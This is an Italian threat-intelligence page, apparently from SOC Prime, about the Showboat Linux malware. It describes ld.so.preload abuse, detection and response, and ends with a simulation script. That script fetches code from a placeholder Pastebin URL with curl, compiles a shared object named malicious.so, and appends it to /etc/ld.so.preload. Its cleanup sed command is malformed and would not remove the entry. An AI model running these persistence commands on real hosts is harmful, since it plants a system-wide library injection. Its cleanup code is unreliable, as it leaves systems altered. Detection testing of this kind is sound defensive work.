SOC Prime Bias: Alto

19 Jun 2026 07:48 UTC

Il Malware Showboat Prende di Mira le Aziende di Telecomunicazioni del Medio Oriente dal 2022

Author Photo
SOC Prime Team linkedin icon Segui
Il Malware Showboat Prende di Mira le Aziende di Telecomunicazioni del Medio Oriente dal 2022
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

Showboat è un framework modulare di post-sfruttamento per Linux costruito per ambienti AMD x86-64. Attivo dalla metà del 2022, è progettato per mantenere un accesso silenzioso e a lungo termine all’interno di reti compromesse. Il malware utilizza metodi avanzati di evasione, inclusa la crittografia XOR e l’abuso del linker dinamico per nascondere i processi dannosi.

Investigazione

L’indagine ha tracciato l’infrastruttura di comando e controllo a Chengdu, Cina, che, insieme alle tattiche, tecniche e procedure osservate, suggerisce legami con attori della minaccia allineati con la RPC. L’analisi tecnica ha mostrato che il malware si basa su una chiave XOR codificata per decrittare la sua configurazione e abusa di ld.so.preload per ottenere stealth sui sistemi infettati.

Mitigazione

I difensori dovrebbero monitorare le modifiche non autorizzate a /etc/ld.so.preload e l’uso sospetto del gcc compilatore su host Linux di produzione. Si raccomanda inoltre di distribuire il monitoraggio della rete capace di identificare il comportamento di beaconing, anche quando il timing è casualizzato, e di utilizzare il monitoraggio dell’integrità per le librerie di sistema critiche.

Risposta

Se viene rilevata un’attività di Showboat, isolare immediatamente i sistemi Linux interessati dalla rete per interrompere ulteriori traffico di comando e controllo. Eseguire la ricerca forense della memoria per identificare gli oggetti condivisi iniettati e condurre un audit completo delle impostazioni di sistema e delle attività pianificate per confermare che tutti i meccanismi di persistenza siano stati rimossi.

Flusso di Attacco

Esecuzione di Simulazione

Prerequisito: Il Controllo Pre-volo di Telemetria & Baseline deve essere passato.

Motivazione: Questa sezione dettaglia l’esatta esecuzione della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare l’esatta telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.

  • Narrazione dell’Attacco & Comandi: L’attaccante mira a stabilire un’intercettazione persistente delle chiamate di sistema. Cominciano scaricando un file sorgente C dannoso da un URL raw di Pastebin utilizzando curl. Una volta scaricato, usano gcc con i -shared and -fPIC flag per compilare il sorgente in un file oggetto condiviso denominato malicious.so. Infine, tentano di ottenere la persistenza aggiungendo il percorso di questa libreria a /etc/ld.so.preload. Questa sequenza è progettata per iniettare la libreria dannosa in ogni processo nel sistema.

  • Script di Test di Regressione:

    #!/bin/bash
    # Simulazione dei TTP del Malware Showboat
    
    # 1. Simula il recupero del C source da Pastebin
    # Nota: Utilizzo di un vero link raw pastebin (mockato per logica) o simulazione della stringa
    echo "Creazione di simulazione di download da pastebin fittizio..."
    echo 'void __attribute__((constructor)) init() {}' > fake_malware.c
    
    # Questo comando attiva la parte 'selection_fetch' della regola
    curl -s https://pastebin.com/raw/example_id -o fake_malware.c
    
    # 2. Simula la compilazione di un oggetto condiviso
    # Questo comando attiva la parte 'selection_compile' della regola
    # (selection_fetch E selection_compile)
    gcc -shared -fPIC -o /tmp/malicious.so fake_malware.c
    
    # 3. Simula la modifica di ld.so.preload
    # Questo comando attiva la parte 'selection_preload' della regola
    echo "/tmp/malicious.so" | sudo tee -a /etc/ld.so.preload
    
    echo "Simulazione completa. Controlla SIEM per avvisi."
  • Comandi di Pulizia:

    #!/bin/bash
    # Pulisci simulazione artefatti
    
    # Rimuovi la libreria dannosa e il sorgente
    sudo rm -f /tmp/malicious.so
    rm -f fake_malware.c
    
    # Rimuovi la voce da ld.so.preload (Richiede cautela)
    # Questo comando sed rimuove la linea contenente /tmp/malicious.so
    sudo sed -i '//tmp/malicious.so/d' /etc/ld.so.preload
    
    echo "Pulizia completata."